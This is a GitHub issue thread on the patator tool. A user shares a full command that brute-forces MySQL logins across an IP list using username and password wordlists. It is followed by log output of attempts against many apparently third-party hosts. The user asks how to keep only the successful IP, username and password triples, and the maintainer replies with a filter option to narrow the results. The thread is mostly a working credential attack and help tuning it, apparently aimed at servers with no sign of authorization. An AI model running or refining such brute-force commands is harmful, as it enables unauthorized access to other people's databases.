### ISSUE TITLE
save output

### ISSUE THREAD

**Issue by palman2000** [lanjelot/patator#41]
Hello
Thank you for your script
But we have a big problem
When you perform a brute-force command
./patator.py mysql_login host=FILE0 user=FILE1 password=FILE2 0=ip.txt 1=user.txt 2=pass.txt -x ignore:fgrep='Access denied for user' -L login.txt -t 50

The script save all the results in a file RESULTS.csv

20:27:16,INFO,1130,67,0.138,23.89.169.181:root:amp1,3890,Host '158.0.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1045,73,0.141,23.105.52.82:astedb:root,3495,Access denied for user 'asteriskdb'@'158.69.33.139' (using password: YES)
20:27:16,INFO,1130,67,0.132,23.104.253.183:admin:a1,4046,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1045,71,0.151,23.105.52.3:ragnarok:amp1,3047,Access denied for user 'ragnarok'@'158.69.33.139' (using password: YES)
20:27:16,INFO,1130,67,0.132,23.104.253.182:aste:amp111,4100,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1130,67,0.132,23.104.253.212:ast:root,4131,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1045,68,0.141,23.105.52.233:admin:a1,3536,Access denied for user 'admin'@'158.69.33.139' (using password: YES)
20:27:16,INFO,1045,68,0.141,23.105.52.233:admin:root,3537,Access denied for user 'admin'@'158.69.33.139' (using password: YES)
20:27:16,INFO,1130,67,0.132,23.104.253.59:root:root,3939,Host '178.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1130,67,0.136,23.104.253.59:admin:Bobo1337,3940,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1045,73,0.140,23.105.52.33:astdb:amp111,3194,Access denied for user 'asteriskdb'@'158.69.33.139' (using password: YES)
20:27:16,INFO,1130,67,0.132,23.104.253.182:ragnarok:Bobo1337,4096,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1045,67,0.140,23.105.52.40:root:Bobo1337,3097,Access denied for user 'root'@'158.69.33.139' (using password: YES)
20:27:16,INFO,1130,67,0.132,23.104.253.81:admin:Bobo1337,4150,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1130,67,0.132,23.104.253.64:admin:a11,4181,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1130,67,0.132,23.104.253.121:ragnarok:Bobo1337,3586,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1130,67,0.26,23.104.253.121:ragnarok:ampt1,3587,Host '158.69.33.139' is not allowed to connect to this MySQL server
20:27:16,INFO,1130,67,0.132,23.104.253.190:asteb:amp111,3989,Host '158.69.33.139' is not allowed to connect to this MySQL server

I want to save the results of a successful entry only
IP  USERNAME  PASSWORD 

Thank you in waiting for a reply

**Comment by lanjelot** [comment]
Sounds like you also want to pass `-x ignore:fgrep='is not allowed to connect to this MySQL server'`. And you'll need to write your own script to convert RESULTS.csv to your own IP/USERNAME/PASSWORD format.
